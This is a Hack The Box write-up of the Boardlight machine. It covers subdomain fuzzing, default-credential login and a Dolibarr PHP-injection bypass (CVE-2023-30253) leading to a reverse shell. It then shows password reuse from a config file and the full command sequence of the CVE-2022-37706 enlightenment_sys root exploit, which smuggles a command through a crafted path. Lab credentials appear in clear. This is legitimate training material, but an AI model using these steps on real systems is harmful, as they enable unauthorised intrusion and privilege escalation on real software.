HTB Boardlight writeup [20 pts]
Boardlight is a linux machine that involves dolibarr exploitation and an enlightenment cve. First, a discovered subdomain uses dolibarr 17.0.0 as crm which is vulnerable to php injection that I used to receive a reverse shell as www-data. With that access, I had permissions to read php configuration files where mysql password is saved and it’s reused for larissa system user. Finally, looking for files with SUID permissions, I saw enlightenment_sys binary which is vulnerable to CVE-2022-37706 (code injection) and as the owner is root I can access as him.
Ports recognaissance
❯ sudo nmap -sS --min-rate 5000 -p- --open -v -n -Pn -sVC -oA boardlight
❯ cat boardlight.nmap
# Nmap 7.94SVN scan initiated Fri Sep 27 18:18:39 2024 as: nmap -sS --min-rate 5000 -p- --open -v -n -Pn -sVC -oA boardlight
Nmap scan report for
Host is up (0.36s latency).
Not shown: 59342 closed tcp ports (reset), 6191 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Sep 27 18:19:15 2024 -- 1 IP address (1 host up) scanned in 35.87 seconds
There are two ports open, 22 and 80.
- 80 -> HTTP, Apache 2.4.41.
- 22 -> OpenSSH 8.2p1 Ubuntu, useful when I get credentials or keys.
I don’t have creds for ssh so I will jump into port 80.
Web enumeration (Port 80)
Taking a look with curl, I can see that it doesn’t have a title and nothing more interesting:
❯ curl -i -s | less
HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 16:25:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<!-- Basic -->
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<!-- Mobile Metas -->
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<!-- Site Metas -->
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="author" content="" />
<!-- slider stylesheet -->
<!-- slider stylesheet -->
<link rel="stylesheet" type="text/css" href="" />
<!-- bootstrap core css -->
<link rel="stylesheet" type="text/css" href="css/bootstrap.css" />
<!-- fonts style -->
<link href=",700|Poppins:400,700&display=swap" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="css/style.css" rel="stylesheet" />
<!-- responsive style -->
<link href="css/responsive.css" rel="stylesheet" />
Also, whatweb doesn’t shows anything interesting appart from an email info@board.htb:
❯ whatweb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
Taking a look in the browser shows that it’s a landing page:
At the footer also appears the domain board.htb
So in case that this domain is used in apache to retrieve some different webpage, I will add it to the end of my /etc/hosts file for my system to know to which IP should solve that domain:
❯ sudo vi /etc/hosts board.htb
But that’s not the case because the md5 hash value of the whole page of both IP and domain is same (which means that the content is the same):
❯ curl -s | md5sum
6d780449d37c147a5c38a0eeff9d4f2d -
❯ curl -s board.htb | md5sum
6d780449d37c147a5c38a0eeff9d4f2d -
However, I still can enumerate subdomains with the Host
header to see if someone is valid:
❯ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fs 15949
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 15949
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 375ms]
:: Progress: [114441/114441] :: Job [1/1] :: 108 req/sec :: Duration: [0:18:23] :: Errors: 0 ::
I can see the crm.board.htb subdomain, which I will add to the /etc/hosts. Inspecting it with curl, I can see it consists on a dolibarr 17.0.0 instance:
❯ curl -s crm.board.htb | less
And in the browser looks like this:
Searching for what dolibarr is, I can see it’s a web-based ERP and CRM software:
ERP is a software which allows to manage financial staff in a business:
And a CRM is a software that lets store customer information, identify sales opportunities, etc:
Access as www-data
Looking for vulnerabilities of dolibarr 17.0.0, I can see this article that talks about exploiting CVE-2023-30253, a PHP code injection vulnerability:
But it requires authentication:
However, trying admin:admin does work:
I will add a website like the PoC says:
And add a page in that created website:
Then, I will click on “Edit HTML Source” and try to add php code that executes the whoami command:
But it says that the system function is disabled (as shown in the PoC):
The PoC says it can be bypassed by putting some letter of <?php
in uppercase because the filters of dolibarr code doesn’t check the case:
So I will put <?PHP
instead of <?php
and see what happens:
Now clicking on “Show dynamic content”, I can see the results of whoami
But instead of executing whoami, I want to get access to the system, so I will start a nc listener and put a command to receive a reverse shell there:
And I receive a shell as www-data in the host machine:
Now, I will do a tty treatment to have a more stabilized shell, do ctrl+c, ctrl+l, etc:
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ script /dev/null -c bash
<.board.htb/htdocs/website$ script /dev/null -c bash
Script started, file is /dev/null
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ ^Z
[1] + 30548 suspended nc -lvnp 443
❯ stty raw -echo; fg
[1] + 30548 continued nc -lvnp 443
reset xterm
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ export TERM=xterm
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ export SHELL=bash
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ stty rows 50 cols 184
script /dev/null -c bash
Access as larissa
Looking for php configuration files, I can see that the user.class.php uses some sql queries to execute:
www-data@boardlight:~/html/crm.board.htb/htdocs$ cat user/class/user.class.php | grep -i SELECT
$sql = "SELECT u.rowid, u.lastname, u.firstname, u.employee, u.gender, u.civility as civility_code, u.birth,, u.personal_email, u.job,";
$sql = "SELECT param, value FROM ".$this->db->prefix()."user_param";
$sql = "SELECT module, perms, subperms";
$sql = "SELECT id";
$sql = "SELECT module, perms, subperms";
$sql = "SELECT id";
$sql = "SELECT DISTINCT r.module, r.perms, r.subperms";
$sql = "SELECT DISTINCT r.module, r.perms, r.subperms";
$sqltochecklogin = "SELECT COUNT(*) as nb FROM ".$this->db->prefix()."user WHERE entity IN (".$this->db->sanitize((int) $this->entity).", 0) AND login = '".$this->db->escape($this->login)."'";
$sqltochecklogin = "SELECT COUNT(*) as nb FROM ".$this->db->prefix()."user WHERE entity IN (".$this->db->sanitize((int) $this->entity).", 0) AND email = '".$this->db->escape($this->email)."'";
$sql = "SELECT id FROM ".$this->db->prefix()."rights_def";
$sqltochecklogin = "SELECT COUNT(*) as nb FROM ".$this->db->prefix()."user WHERE entity IN (".$this->db->sanitize((int) $this->entity).", 0) AND login = '".$this->db->escape($this->login)."'";
$sqltochecklogin = "SELECT COUNT(*) as nb FROM ".$this->db->prefix()."user WHERE entity IN (".$this->db->sanitize((int) $this->entity).", 0) AND email = '".$this->db->escape($this->email)."'";
$sql = "SELECT url, login, pass, poste ";
$info[$conf->global->LDAP_FIELD_GROUPID] = $groupforuser->id; //Select first group in list
$sql = "SELECT u.rowid, u.login as ref, u.datec,";
$sql = "SELECT count( as nb";
$sql = "SELECT count(rowid) as nb";
$sql = "SELECT rowid FROM ".$this->db->prefix()."user";
$sql = "SELECT fk_user as id_parent, rowid as id_son";
$sql = "SELECT DISTINCT u.rowid, u.firstname, u.lastname, u.fk_user, u.fk_soc, u.login,, u.gender, u.admin, u.statut,, u.entity"; // Distinct reduce pb with old tables with duplicates
$sql = "SELECT COUNT(DISTINCT u.rowid) as nb";
$sql = "SELECT rowid, email, user_mobile, civility, lastname, firstname";
$sql = "SELECT t.rowid";
$sql = 'SELECT rowid';
But some credentials are needed to use sql so where are saved? In that script, I can see that to execute a query is using the function query of the class db of the current object:
public function findUserIdByEmail($email)
if (isset($this->findUserIdByEmailCache[$email])) {
return $this->findUserIdByEmailCache[$email];
$this->findUserIdByEmailCache[$email] = -1;
global $conf;
$sql = 'SELECT rowid';
$sql .= ' FROM '.$this->db->prefix().'user';
$sql .= " WHERE email LIKE '%".$this->db->escape($email)."%'";
} else {
$sql .= " WHERE email = '".$this->db->escape($email)."'";
$sql .= ' LIMIT 1';
$resql = $this->db->query($sql);
if (!$resql) {
return -1;
$obj = $this->db->fetch_object($resql);
if (!$obj) {
return -1;
$this->findUserIdByEmailCache[$email] = (int) $obj->rowid;
return $this->findUserIdByEmailCache[$email];
Searching recursively for that variable in php script, I can see it uses the ‘$conf’ variable for the user, password, etc:
www-data@boardlight:~/html/crm.board.htb/htdocs$ grep '$db' -r *.php
The $conf
variable takes the parameters from variables like $dolibarr_main_db_user
and $dolibarr_main_db_pass
that are taked from some php file:
require_once DOL_DOCUMENT_ROOT.'/core/class/conf.class.php';
$conf = new Conf();
// Set properties specific to database
$conf->db->host = empty($dolibarr_main_db_host) ? '' : $dolibarr_main_db_host;
$conf->db->port = empty($dolibarr_main_db_port) ? '' : $dolibarr_main_db_port;
$conf->db->name = empty($dolibarr_main_db_name) ? '' : $dolibarr_main_db_name;
$conf->db->user = empty($dolibarr_main_db_user) ? '' : $dolibarr_main_db_user;
$conf->db->pass = empty($dolibarr_main_db_pass) ? '' : $dolibarr_main_db_pass;
$conf->db->type = $dolibarr_main_db_type;
$conf->db->prefix = $dolibarr_main_db_prefix;
$conf->db->character_set = $dolibarr_main_db_character_set;
$conf->db->dolibarr_main_db_collation = $dolibarr_main_db_collation;
$conf->db->dolibarr_main_db_encryption = $dolibarr_main_db_encryption;
$conf->db->dolibarr_main_db_cryptkey = $dolibarr_main_db_cryptkey;
if (defined('TEST_DB_FORCE_TYPE')) {
$conf->db->type = constant('TEST_DB_FORCE_TYPE'); // Force db type (for test purpose, by PHP unit for example)
And I can see they are stored in the conf/conf.php file:
www-data@boardlight:~/html/crm.board.htb/htdocs$ cat conf/conf.php | grep 'dolibarr_main_db'
However, the only user stored in the dolibarr database that is interesting is dolibarr (because I already know that the password of admin is admin):
www-data@boardlight:~/html/crm.board.htb/htdocs$ mysql -udolibarrowner -p'serverfun2$2023!!'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 197
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
| Database |
| dolibarr |
| information_schema |
| performance_schema |
3 rows in set (0.00 sec)
mysql> use dolibarr;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
| Tables_in_dolibarr |
mysql> describe llx_user;
mysql> select login,pass_crypted from llx_user;
| login | pass_crypted |
| dolibarr | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm |
| admin | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 |
2 rows in set (0.00 sec)
But the hash of dolibarr
user doesn’t seem crackable.
There’s also a larissa
user in the home
www-data@boardlight:~/html/crm.board.htb/htdocs$ cd /home/
www-data@boardlight:/home$ ls
And trying the password used in the database for larissa user of the system does work (because it’s reused):
www-data@boardlight:/home$ su larissa
Password: serverfun2$2023!!
The user.txt flag is available in larissa’s home directory:
larissa@boardlight:/home$ cd larissa/
larissa@boardlight:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
larissa@boardlight:~$ cat user.txt
Access as root
Looking for executables with SUID permissions, I can see some enlightenment binaries:
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
Enlightenment is a custom window manager:
Looking for its version, I can see it’s 0.23.1:
larissa@boardlight:~$ enlightenment -version
ESTART: 0.00001 [0.00001] - Begin Startup
ESTART: 0.00004 [0.00004] - Signal Trap
ESTART: 0.00005 [0.00001] - Signal Trap Done
ESTART: 0.00007 [0.00002] - Eina Init
ESTART: 0.00036 [0.00029] - Eina Init Done
ESTART: 0.00038 [0.00002] - Determine Prefix
ESTART: 0.00052 [0.00014] - Determine Prefix Done
ESTART: 0.00053 [0.00001] - Environment Variables
ESTART: 0.00054 [0.00001] - Environment Variables Done
ESTART: 0.00054 [0.00001] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
As there are SUID binaries, I can try looking for vulnerabilities of enlightenment, which brings me to this github belonging to the same author that found CVE-2022-37706, a privilege escalation vulnerability on enlightenment before 0.25.4 (which is the case):
The author explains so well how did he find the vulnerability, if you are interested you can read it. In the poc gif, I can see its using the file, which tries to find the enlightenment_sys binary and executes some commands to give a root shell:
I will replicate it and it works:
larissa@boardlight:/tmp$ mkdir -p /tmp/net
larissa@boardlight:/tmp$ mkdir -p "/dev/../tmp/;/tmp/exploit"
larissa@boardlight:/tmp$ echo "/bin/sh" > /tmp/exploit
larissa@boardlight:/tmp$ chmod a+x /tmp/exploit
larissa@boardlight:/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
Now I can see root.txt, which is available in root’s home:
# cd /root
# ls
root.txt snap
# cat root.txt
That’s the machine guys. Hope you liked it!